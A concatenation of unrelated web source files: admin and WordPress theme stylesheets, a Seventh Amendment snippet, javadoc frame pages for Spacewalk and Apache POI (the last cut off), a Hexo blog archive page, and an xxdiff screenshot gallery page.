text-align: center;
width: 22px;
}
.spinner-buttons.btn-group-vertical .btn i {
margin-top: -3px;
}
.spinner-buttons.btn-group-vertical .btn:first-child {
border-radius: 0 4px 0 0 !important;
-webkit-border-radius: 0 4px 0 0 !important;
}
.spinner-buttons.btn-group-vertical .btn:last-child {
border-radius: 0 0 4px !important;
-webkit-border-radius: 0 0 4px !important;
}
/**/
.wysihtml5-toolbar .btn-default {
background: #fff;
color: #757575;
}
/*todolist*/
#sortable {
list-style-type: none;
margin: 0 0 20px 0;
padding: 0;
width: 100%;
}
#sortable li {
padding-left: 3em;
font-size: 12px;
}
#sortable li i {
position: absolute;
left:6px;
padding:4px 10px 0 10px;
cursor: pointer;
}
#sortable li input[type=checkbox]{
margin-top: 0;
}
.ui-sortable > li {
padding: 15px 0 15px 35px !important ;
position: relative;
background: #f5f6f8;
margin-bottom: 2px;
border-bottom : none !important;
}
.ui-sortable li.list-primary {
border-left: 3px solid #41CAC0;
}
.ui-sortable li.list-success {
border-left: 3px solid #78CD51;
}
.ui-sortable li.list-danger {
border-left: 3px solid #FF6C60;
}
.ui-sortable li.list-warning {
border-left: 3px solid #F1C500;
}
.ui-sortable li.list-info {
border-left: 3px solid #58C9F3;
}
.ui-sortable li.list-inverse {
border-left: 3px solid #BEC3C7;
}
/*lock screen*/
.lock-screen {
background:#02bac6 url("../img/lock-bg.jpg");
background-size: cover;
background-repeat: repeat;
}
.lock-wrapper {
margin: 10% auto;
max-width: 330px;
}
.lock-box {
background: rgba(255,255,255,.3);
padding: 20px;
border-radius: 10px;
-webkit-border-radius: 10px;
position: relative;
}
.lock-wrapper img {
position: absolute;
left: 27%;
top: -40px;
border-radius: 50%;
-webkit-border-radius: 50%;
border: 5px solid #fff;
}
.lock-wrapper h1 {
text-align: center;
color: #fff;
font-size: 18px;
text-transform: uppercase;
padding: 0px 0 0 0;
}
.lock-wrapper .locked {
margin-bottom: 10px;
display: inline-block;
color: #026f7a;
}
.btn-lock,.btn-lock:hover {
background: #02b5c2;
color: #fff;
}
.lock-input {
width: 83%;
border: none;
float: left;
margin-right: 3px;
}
#time {
width: 100%;
color: #fff;
font-size: 53px;
margin-bottom: 37px;
display: inline-block;
text-align: center;
font-family: 'Open Sans', sans-serif;
font-weight: 300;
padding-top : 85px;
}
/*language*/
.language {
margin-top: 4px;
}
.language .dropdown-menu {
border: 1px solid #eee;
box-shadow: 0 2px 3px rgba(0, 0, 0, 0.176) !important;
}
.language .dropdown-menu li a{
border-bottom: 1px solid #eee;
padding: 10px;
}
.language .dropdown-menu li:last-child a {
border-bottom: none;
}
.language .dropdown-menu li a {
font-size: 13px;
}
/*product list*/
.prod-cat li a{
border-bottom: 1px dashed #d9d9d9;
}
.prod-cat li a {
color: #3b3b3b;
}
.prod-cat li ul {
margin-left: 30px;
}
.prod-cat li ul li a{
border-bottom:none;
}
.prod-cat li ul li a:hover,.prod-cat li ul li a:focus, .prod-cat li ul li.active a , .prod-cat li a:hover,.prod-cat li a:focus, .prod-cat li a.active{
background: none;
color: #ff7261;
}
.pro-lab{
margin-right: 20px;
font-weight: normal;
}
.pro-sort {
padding-right: 20px;
float: left;
}
.pro-page-list {
margin: 5px 0 0 0;
}
.product-list img{
width: 100%;
border-radius: 4px 4px 0 0;
-webkit-border-radius: 4px 4px 0 0;
}
.product-list .pro-img-box {
position: relative;
}
.adtocart {
background: #fc5959;
width: 50px;
height: 50px;
border-radius: 50%;
-webkit-border-radius: 50%;
color: #fff;
display: inline-block;
text-align: center;
border: 3px solid #fff;
left: 45%;
bottom: -25px;
position: absolute;
}
.adtocart i{
color: #fff;
font-size: 25px;
line-height: 42px;
}
.pro-title {
color: #5A5A5A;
display: inline-block;
margin-top: 20px;
font-size: 16px;
}
.product-list .price {
color:#fc5959 ;
font-size: 15px;
}
.pro-img-details {
margin-left: -15px;
}
.pro-img-details img {
width: 100%;
}
.pro-d-title {
font-size: 16px;
margin-top: 0;
}
.product_meta {
border-top: 1px solid #eee;
border-bottom: 1px solid #eee;
padding: 10px 0;
margin: 15px 0;
}
.product_meta span {
display: block;
margin-bottom: 10px;
}
.product_meta a, .pro-price{
color:#fc5959 ;
}
.pro-price, .amount-old {
font-size: 18px;
padding: 0 10px;
}
.amount-old {
text-decoration: line-through;
}
.quantity {
width: 120px;
}
.pro-img-list {
margin: 10px 0 0 -15px;
width: 100%;
display: inline-block;
}
.pro-img-list a {
float: left;
margin-right: 10px;
margin-bottom: 10px;
}
.pro-d-head {
font-size: 18px;
font-weight: 300;
}
/*footer*/
.site-footer {
background: #5b6e84;
color: #fff;
padding: 10px 0;
}
.go-top {
margin-right: 1%;
float: right;
background: rgba(255,255,255,.5);
width: 20px;
height: 20px;
border-radius: 50%;
-webkit-border-radius: 50%;
}
.go-top i {
color: #2A3542;
}
.site-min-height {
min-height: 550px;
}
|
foundation-gen/src/main/resources/document/amendment-7.foundation.html | mytake/mytake | <p>In Suits at common law, where the value in controversy shall exceed twenty dollars, the right of trial by jury shall be preserved, and no fact tried by a jury, shall be otherwise re-examined in any Court of the United States, than according to the rules of the common law.</p>
|
documentation/javadoc/com/redhat/rhn/frontend/xmlrpc/preferences/locale/package-frame.html | colloquium/spacewalk | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_18) on Tue Nov 02 13:16:54 CET 2010 -->
<TITLE>
com.redhat.rhn.frontend.xmlrpc.preferences.locale
</TITLE>
<META NAME="date" CONTENT="2010-11-02">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
<FONT size="+1" CLASS="FrameTitleFont">
<A HREF="../../../../../../../com/redhat/rhn/frontend/xmlrpc/preferences/locale/package-summary.html" target="classFrame">com.redhat.rhn.frontend.xmlrpc.preferences.locale</A></FONT>
<TABLE BORDER="0" WIDTH="100%" SUMMARY="">
<TR>
<TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont">
Classes</FONT>
<FONT CLASS="FrameItemFont">
<BR>
<A HREF="PreferencesLocaleHandler.html" title="class in com.redhat.rhn.frontend.xmlrpc.preferences.locale" target="classFrame">PreferencesLocaleHandler</A>
<BR>
<A HREF="PreferencesLocaleHandler.LocalePredicate.html" title="class in com.redhat.rhn.frontend.xmlrpc.preferences.locale" target="classFrame">PreferencesLocaleHandler.LocalePredicate</A>
<BR>
<A HREF="PreferencesLocaleHandler.TzPredicate.html" title="class in com.redhat.rhn.frontend.xmlrpc.preferences.locale" target="classFrame">PreferencesLocaleHandler.TzPredicate</A></FONT></TD>
</TR>
</TABLE>
</BODY>
</HTML>
|
archives/2015/06/index.html | Jocoo2015/Jocoo2015.github.io | <!doctype html>
<html class="theme-next mist use-motion">
<head>
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />
<link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />
<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />
<meta name="keywords" content="Hexo, NexT" />
<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />
<meta name="description" content="Jocoo's blog">
<meta property="og:type" content="website">
<meta property="og:title" content="Jocoo's blog">
<meta property="og:url" content="http://Jocoo2015.github.com/archives/2015/06/index.html">
<meta property="og:site_name" content="Jocoo's blog">
<meta property="og:description" content="Jocoo's blog">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Jocoo's blog">
<meta name="twitter:description" content="Jocoo's blog">
<script type="text/javascript" id="hexo.configuration">
var NexT = window.NexT || {};
var CONFIG = {
scheme: 'Mist',
sidebar: {"position":"left","display":"post"},
fancybox: true,
motion: true,
duoshuo: {
userId: 0,
author: '博主'
}
};
</script>
<link rel="canonical" href="http://Jocoo2015.github.com/archives/2015/06/"/>
<title> 归档 | Jocoo's blog </title>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
<div class="container one-collumn sidebar-position-left page-archive ">
<div class="headband"></div>
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">Jocoo's blog</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle">Stay hungry, Stay foolish.</p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br />
首页
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
归档
</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags" rel="section">
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
标签
</a>
</li>
</ul>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<section id="posts" class="posts-collapse">
<span class="archive-move-on"></span>
<span class="archive-page-counter">
嗯..! 目前共计 8 篇日志。 继续努力。
</span>
<div class="collection-title">
<h2 class="archive-year motion-element" id="archive-year-2015">2015</h2>
</div>
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
<header class="post-header">
<h1 class="post-title">
<a class="post-title-link" href="/2015/06/23/2015-6-23-install-vim-from-source/" itemprop="url">
<span itemprop="name">Install vim from source</span>
</a>
</h1>
<div class="post-meta">
<time class="post-time" itemprop="dateCreated"
datetime="2015-06-23T00:00:00+08:00"
content="2015-06-23" >
06-23
</time>
</div>
</header>
</article>
</section>
</div>
</div>
<div class="sidebar-toggle">
<div class="sidebar-toggle-line-wrap">
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
</div>
</div>
<aside id="sidebar" class="sidebar">
<div class="sidebar-inner">
<section class="site-overview sidebar-panel sidebar-panel-active ">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image"
src="/images/avatar.gif"
alt="Jocoo" />
<p class="site-author-name" itemprop="name">Jocoo</p>
<p class="site-description motion-element" itemprop="description">Jocoo's blog</p>
</div>
<nav class="site-state motion-element">
<div class="site-state-item site-state-posts">
<a href="/archives">
<span class="site-state-item-count">8</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<span class="site-state-item-count">2</span>
<span class="site-state-item-name">分类</span>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags">
<span class="site-state-item-count">8</span>
<span class="site-state-item-name">标签</span>
</a>
</div>
</nav>
<div class="links-of-author motion-element">
</div>
</section>
</div>
</aside>
</div>
</main>
<footer id="footer" class="footer">
<div class="footer-inner">
<div class="copyright" >
©
<span itemprop="copyrightYear">2017</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">Jocoo</span>
</div>
<div class="powered-by">
由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>
<div class="theme-info">
主题 -
<a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
NexT.Mist
</a>
</div>
</div>
</footer>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
</div>
</div>
<script type="text/javascript">
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
</script>
<script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>
<script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
<script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
<script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>
<script type="text/javascript" id="motion.page.archive">
$('.archive-year').velocity('transition.slideLeftIn');
</script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>
</body>
</html>
|
wp-content/themes/swebmarketing/style.css | maniax89/swebmarketing | /*
Theme Name: Sweb Marketing
Theme URI: http://swebmarketing.com/swebmarketing/
Description: Sweb Marketing theme based off of Customizr
Author: Andrew Turgeon
Author URI: http://andrewpturgeon.com
Template: customizr
Version: 1.0.0
Tags: light, responsive-layout, accessibility-ready
Text Domain: sweb-marketing
*/
@import url("../customizr/style.css");
/*site wide styles*/
.teal{
background-color:#00B197;
}
.light-teal{
background-color:#00E3B1;
}
.aqua{
background-color:#00CE97;
}
.dark{
background-color:#231F20;
}
.light{
background-color:#FFFFFF;
}
.gray{
background-color:#DBDBDB;
}
.size-3x5,.size-2x3,.size-3x4 {
display:none;
}
img.bg {
min-height: 100%;
min-width: 910px;
width:100%;
height: auto;
position: fixed;
top: 0;
left: 0;
z-index:-100;
}
html, body{
font-family: 'Magra', sans-serif;
font-weight:400;
font-size: 18pt;
line-height:1em;
overflow-x: hidden;
/*
background-image:url(images/sweb-background-v2-full.jpg) ;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
background-position: center center;
background-repeat: no-repeat;
background-attachment: fixed;
margin: 0;
overflow-x: hidden;
overflow-y: auto;
padding: 0;
width: 100%;
-webkit-overflow-scrolling:touch;
*/
}
/*body.ie{
background-size:40%;
}
body.ie6, body.ie7, body.ie8{
background:none;
}*/
h2{
font-family: 'Magra', sans-serif;
font-weight: 400;
text-shadow: none;
font-size: 2.5em;
padding-bottom:10px;
line-height:0.75em;
text-transform:uppercase;
}
h3{
text-shadow: none;
line-height: 0.3em;
}
h4{
padding-bottom:0;
text-shadow: none;
font-size:1em;
line-height: 1em;
}
input[type="text"], input[type="submit"], input[type="email"]{
-webkit-border-radius: 7px;
-moz-border-radius: 7px;
border-radius: 7px;
}
ol{
margin-left:1em;
}
p{
padding-top:10px;
}
a:active, a:visited{
border:none;
outline:none;
}
.capitalize{
text-transform: capitalize;
line-height:1em;
}
.center{
text-align: center;
}
img.center{
margin:0 auto;
display:block;
}
.row{
margin-left:0;
}
.notransition {
-webkit-transition: none !important;
-moz-transition: none !important;
-o-transition: none !important;
-ms-transition: none !important;
transition: none !important;
}
/*header*/
.tc-header{
border-bottom:none;
background:none;
min-height:55px;
}
.tc-header .site-logo img{
border-radius:4px;
-moz-border-radius:4px;
-webkit-border-radius:4px;
box-shadow:0 2px 10px rgba(0, 0, 0, 0.25);
-moz-box-shadow:0 2px 10px rgba(0, 0, 0, 0.25);
-webkit-box-shadow:0 2px 10px rgba(0, 0, 0, 0.25);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(white), to(#f2f2f2));
background-image: -webkit-linear-gradient(top, white, #f2f2f2);
background-image: -o-linear-gradient(top, white, #f2f2f2);
background-image: linear-gradient(to bottom, white, #f2f2f2);
background-repeat: repeat-x;
background-color:#fafafa;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff' , endColorstr='#fff2f2f2' , GradientType=0);
}
.brand.span3{
width:100%;
margin:0;
position:absolute;
top:15vh;
}
.tc-header .brand a.site-logo{
width:352px;
margin: 0 auto;
-webkit-transition: -webkit-transform 1s ease; /* Chrome 1-25, Safari 3.2+ */
-moz-transition: -moz-transform 1s ease; /* Firefox 4-15 */
-o-transition: -o-transform 1s ease; /* Opera 10.5012.00 */
transition: transform 1s ease; /* Chrome 26, Firefox 16+, IE 10+, Opera 12.10+ */
-ms-transform: scale(0.4); /* IE 9 */
-webkit-transform: scale(0.4); /* Chrome, Safari, Opera */
transform: scale(0.4);
}
.tc-header .brand a.site-logo.visible{
-ms-transform: scale(1); /* IE 9 */
-webkit-transform: scale(1); /* Chrome, Safari, Opera */
transform: scale(1);
}
.tc-header .brand a.site-logo.fixed{
width:120px;
position:fixed;
top:-5px;
left:0;
z-index:110;
-ms-transform: scale(1); /* IE 9 */
-webkit-transform: scale(1); /* Chrome, Safari, Opera */
transform: scale(1);
}
.tc-header .brand a.site-logo.fixed img{
box-shadow: none;
-webkit-box-shadow: none;
}
.social-block.span5{
display:inline-block;
width:auto;
padding:0;
float:right;
}
.span7.inside.site-description{
display:none;
}
/*navigation */
li.menu-item{
line-height:47px;
}
.navbar .nav li a{
font-size:0.80em;
}
.navbar .nav li a:first-letter{
font-size:1em;
}
.navbar-wrapper.span9{
position:absolute;
top:65vh;
margin:0;
min-height:20px;
width:100%;
z-index:100;
}
.navbar.notresp.fixed{
position:fixed;
margin:0;
z-index:10;
top:0;
width:100%;
}
.navbar .navbar-inner{
padding:10px 5px;
min-height:62px;
margin: 0;
}
.navbar .navbar-inner .row-fluid{
margin:0 auto;
max-width:625px;
}
.navbar .nav{
padding:0;
margin:0;
}
#menu-main-menu{
float:right;
}
/*main content */
.section{
padding:5%;
border-top:10px solid #f2f2f2;
}
.inner-section{
margin:0 auto;
max-width:980px;
}
li{
line-height:1em;
}
#intro{
min-height:125px;
}
#content{
width:100%;
margin-left:0;
}
#main-content{
width:100%;
}
#main-wrapper{
width:100%;
margin:0;
margin-top:100vh;
}
.container{
margin-top:-12px;
width:100%;
}
.slide-in{
-webkit-transition: all 1s ease; /* Chrome 1-25, Safari 3.2+ */
-moz-transition: all 1s ease; /* Firefox 4-15 */
-o-transition: all 1s ease; /* Opera 10.5012.00 */
transition: all 1s ease; /* Chrome 26, Firefox 16+, IE 10+, Opera 12.10+ */
-webkit-transform: translateX(-20em);
-ms-transform: translateX(-20em); /* IE 9 */
transform: translateX(-20em);
}
.slide-in.visible{
-webkit-transform: translateX(0);
-ms-transform: translateX(0); /* IE 9 */
transform: translateX(0);
}
.scale-animate{
-webkit-transition: all 1s ease; /* Chrome 1-25, Safari 3.2+ */
-moz-transition: all 1s ease; /* Firefox 4-15 */
-o-transition: all 1s ease; /* Opera 10.5012.00 */
transition: all 1s ease; /* Chrome 26, Firefox 16+, IE 10+, Opera 12.10+ */
-ms-transform: scale(0.4); /* IE 9 */
-webkit-transform: scale(0.4); /* Chrome, Safari, Opera */
transform: scale(0.4);
}
.scale-animate.visible{
-ms-transform: scale(1); /* IE 9 */
-webkit-transform: scale(1); /* Chrome, Safari, Opera */
transform: scale(1);
}
.definition-italics{
font-style:italic;
}
.definition-block{
float:left;
max-width:88%;
}
.definition-img{
float:left;
padding: 5px 10px;
}
.sub{
line-height:1em;
}
.plus{
color:#7986B0;
}
.bold{
font-weight:700;
}
.left-column{
float:left;
width:50%;
}
.right-column{
float:left;
text-align:right;
width:48%;
padding:1%;
}
#quote .right-float{
font-size:0.8em;
}
.right-float{
float:right;
}
.left-float{
float:left;
}
.float-item{
padding:30px 0;
}
.right-float-item img, .right-float-item div{
float:right;
}
.left-float-item img, .left-float-item div{
float:left;
}
.float-item-content{
width:86%;
padding-left:10px;
}
.float-item-content h3{
color:#00E3B1;
font-family:'Abadi MT Condensed Bold', verdana, sans-serif;
}
.sweb-accent{
font-weight:bold;
}
.image-text{
width:110px;
}
.image-text span{
color:#fff;
position:relative;
top:-68px;
left:19px;
width:100%;
font-size:1.2em;
}
.divider{
padding-bottom:10px;
}
.padding-bottom-medium{
padding-bottom:30px;
}
/*our services */
.service-item{
clear:both;
padding:50px 5px 0 0;
}
.service-item img{
width:20%;
float:left;
}
.service-item span{
text-align:left;
width:80%;
vertical-align: middle;
font-size:0.8em;
line-height:400%;
}
#services{
border: none;
padding-top:0;
padding-bottom:50px;
}
#services-header{
padding:5px 5%;
border-top:10px solid #f2f2f2;
}
#services .right-column{
padding:0;
width:50%;
text-align: left;
float: left;
}
#services .left-column{
width:50%;
}
#services .inner-section{
max-width:880px;
position:relative;
left:7%;
}
/*bookblock styling*/
#bb-nav{
max-width:400px;
margin:0 auto;
}
#bb-nav span{
text-align:center;
display:inline-block;
width:25%;
}
.notebook-page{
height:82%;
width:42%;
display:inline-block;
float:left;
padding:1%;
padding-top:33px;
padding-bottom:20px;
font-family:'Comic Sans MS';
line-height:1;
}
.notebook-page.left{
background-image:url(images/notebook-page-flip.jpg);
padding-right:40px;
border-right:1px solid #000;
}
.notebook-page.right{
background-image:url(images/notebook-page.jpg);
padding-left:40px;
border-left:1px solid #000;
}
/*contact form */
.contact-form{
margin:0 auto;
width:60%
}
.contact-form label.grunion-field-label{
text-align:left;
font-size:1em;
line-height:1em;
float:left;
clear:both;
margin-bottom:10px;
}
.contact-form div input[type="text"], .contact-form div input[type="email"]{
float:left;
width:100%;
}
.contact-form label.grunion-field-label span{
display:none;
}
.contact-form input[type="submit"]{
font-family:Helvetica, sans-serif;
font-size:1em;
line-height:1em;
float:right;
}
.contact-form div textarea{
display:block;
-webkit-border-radius: 15px;
-moz-border-radius: 15px;
border-radius: 15px;
height:90px;
width:98%;
margin-top:20px;
clear:both;
}
/*featured services styles*/
.thumb-wrapper.tc-holder{
display:block;
}
.thumb-wrapper.tc-holder img{
margin-top:45px;
width:160px;
-webkit-transition: all 500ms ease;
-moz-transition: all 500ms ease;
-o-transition: all 500ms ease;
-ms-transition: all 500ms ease;
transition: all 500ms ease;
}
.thumb-wrapper.tc-holder img:hover{
-webkit-transform: scale(1.4);
-moz-transform: scale(1.4);
-ms-transform: scale(1.4);
-o-transform: scale(1.4);
transform: scale(1.4);
}
/*footer*/
footer#footer .container{
font-family: Helvetica, sans-serif;
margin-top:5px;
}
.span4.backtop{
float:right;
}
.span4.credits{
width:50%;
}
footer#footer .span4.credits p{
text-align:left;
}
footer#footer p, footer#footer a{
font-size:1.0em;
}
.span4.social-block.pull-left{
display:none;
}
footer#footer .colophon a.back-to-top{
color:#5f5f5f;
}
/* mobile styling */
@media screen and (max-width:979px){
.tc-header .brand a.site-logo{
width:120px;
position:fixed;
top:-5px;
left:0;
z-index:110;
}
.tc-header .brand a.site-logo img{
box-shadow: none;
-webkit-box-shadow: none;
}
.navbar.resp{
position:fixed;
margin:0;
z-index:10;
top:0;
left:0;
width:100%;
}
.navbar .navbar-inner{
margin:0;
float:right;
width:100%;
min-width:190px;
}
.navbar .btn-navbar{
margin-top:12px;
}
.social-block{
position:absolute;
right:50px;
}
.social-block.span5{
padding-right:0;
}
.btn-navbar{
float:right;
}
#main-wrapper{
padding:0;
margin-top:0;
}
.bb-bookblock {
width:100%;
}
.notebook-page{
width:35%;
}
.widget-front .thumb-wrapper{
width:228px;
height:225px;
}
.thumb-wrapper.tc-holder img{
margin-top:15px;
margin-left:28px;
}
.float-item-content{
width:82%;
}
}
@media screen and (max-width:910px){
img.bg{
left:50%;
margin-left:-455px;
}
}
@media screen and (max-width:767px){
.span12.article-container .thumb-wrapper img{
top:32px;
left:0;
margin-top:0;
margin-left:0;
}
.float-item-content{
width:70%;
}
.left-column, .right-column{
width:100%;
}
#services .left-column{
width:100%;
}
#services .right-column{
width:100%;
float:left;
}
#services-header div{
max-width:480px;
}
#services .inner-section{
position:static;
}
.service-item{
max-width:480px;
margin:0 auto;
}
}
@media screen and (max-width: 480px){
.navbar .navbar-inner{
min-width:125px;
padding-left:20px;
}
.span12.article-container .thumb-wrapper{
height:225px;
}
.float-item-content{
width:100%;
}
#intro{
padding-top:40px;
}
/*html, body{
background-image:url(images/sweb-background-v2-3x5.jpg);
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
background-position: center center;
background-repeat: no-repeat;
background-attachment: fixed;
height:100%;
}*/
.size-full,.size-3x4,.size-2x3{
display:none;
}
.size-3x5{
display:block;
}
.service-item span{
font-size:0.7em;
line-height:300%;
}
}
@media screen and (max-width: 320px){
/* html, body{
background-image:url(images/sweb-background-v2-2x3.jpg);
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
background-position: center center;
background-repeat: no-repeat;
background-attachment: fixed;
}
*/
.size-full,.size-3x4,.size-3x5x3{
display:none;
}
.size-2x3{
display:block;
}
}
@media screen and (max-width: 240px){
/*html, body{
background-image:url(images/sweb-background-v2-3x4.jpg);
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
background-position: center center;
background-repeat: no-repeat;
background-attachment: fixed;
}*/
.size-full,.size-3x5,.size-2x3{
display:none;
}
.size-2x3{
display:block;
}
} |
doc/screenshots/xxdiff-snap-opt4.html | hackhowtofaq/xxdiff | <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="Curator (Revision: 1.12)">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>Image: options dialog color options</TITLE>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
<CENTER>
<!-- quick navigator at the top -->
<TABLE WIDTH="100%" COLS=2 BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR><TD WIDTH=50% ALIGN=LEFT>
<A HREF="xxdiff-snap-opt3.html">
<<</A>
</TD><TD WIDTH=50% ALIGN=RIGHT>
<A HREF="xxdiff-snap-opt5.html">
>></A>
</TD></TR></TABLE>
<IMG SRC="xxdiff-snap-opt4.jpg" WIDTH=744 HEIGHT=432 BORDER=5 ALT=xxdiff-snap-opt4.jpg>
</CENTER>
<P>
<!--description and camera settings, in a table-->
<TABLE WIDTH="100%" BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR>
<TD WIDTH="90%" VALIGN="TOP">
<!--title and location in big, if available, to the left-->
<BIG STYLE="font-family: Arial,Geneva,sans-serif; font-size: 24px;">
options dialog color options<BR>
</BIG>
</FONT>
<P>
<!--previous and next thumbnails, with text in between-->
<BR>
<CENTER>
<HR NOSHADE SIZE=1 WIDTH="90%">
<TABLE WIDTH="100%" BORDER="0">
<TR>
<TD WIDTH="150">
<A HREF="xxdiff-snap-opt3.html">
<IMG SRC="xxdiff-snap-opt3--thumb.jpg" WIDTH=150 HEIGHT=87 ALIGN=LEFT ALT="Previous (globally)"></A>
</TD><TD ALIGN="CENTER" BGCOLOR="#F4F4F4" CELLPADDING=5>
<!--dirnav, alternative representations and navigation,
between the floating thumbs-->
<B>
<A HREF="dirindex.html">(root)</A>
::
<A HREF="xxdiff-snap-opt4.jpg">xxdiff-snap-opt4.jpg</A>
</B><BR>
<BR>
<A HREF="xxdiff-snap-opt3.html"><FONT SIZE=-2>prev</FONT></A>
[<A HREF="dirindex.html"><FONT SIZE=-2>dir</FONT></A>]
<A HREF="xxdiff-snap-opt5.html"><FONT SIZE=-2>next</FONT></A>
<P>
</TD>
<TD WIDTH="150">
<A HREF="xxdiff-snap-opt5.html">
<IMG SRC="xxdiff-snap-opt5--thumb.jpg" WIDTH=150 HEIGHT=87 ALIGN=RIGHT ALT="Next (globally)"></A>
</TD></TR></TABLE>
</CENTER>
</TD>
<TD WIDTH="10%" ALIGN="RIGHT" VALIGN="TOP">
</TD>
</TR>
</TABLE>
</FONT>
<!--
<!- -tagcode:
if settings:
fontspec = '<FONT STYLE="font-family: Arial,Geneva,sans-serif; ' + \
'font-weight: bold;" SIZE=-2>'
print "<TABLE COLS=3 ROWS=2 WIDTH=100%><TR><TD>"
print fontspec
print """
CAMERA SETTINGS:<BR>
</TD></TR><TR>"""
ssettings = settings.split( '\n' )
ls = len(ssettings)
sets = [ 0, int(ls*0.33), int(ls*0.66), ls ]
for i in range(0,3):
print "<TD>"
print fontspec
for s in ssettings[ sets[i] : sets[i+1] ]:
print "%s<BR>" % s
print "</TD>"
print "</TR></TABLE>"
-->
<HR NOSHADE SIZE=2 WIDTH=90%>
<CENTER><I><FONT SIZE=-2>
All images and material are
</FONT><FONT SIZE=-1>
<B>Copyright © 2001 Martin Blais, Montreal, Canada.<BR></B>
</FONT><FONT SIZE=-2>
All Rights Reserved. Images may not be used without written permission.<BR>
If you would like to license or use an image, please contact
<B><A HREF="mailto:blais@furius.ca">blais@furius.ca</A></B>
</FONT></I></CENTER>
</BODY>
</HTML>
|
lib/docs/apidocs/org/apache/poi/hssf/usermodel/class-use/HSSFDataFormat.html | setu9760/Jade_project_repo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="ru">
<head>
<title>Uses of Class org.apache.poi.hssf.usermodel.HSSFDataFormat (POI API Documentation)</title>
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.poi.hssf.usermodel.HSSFDataFormat (POI API Documentation)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
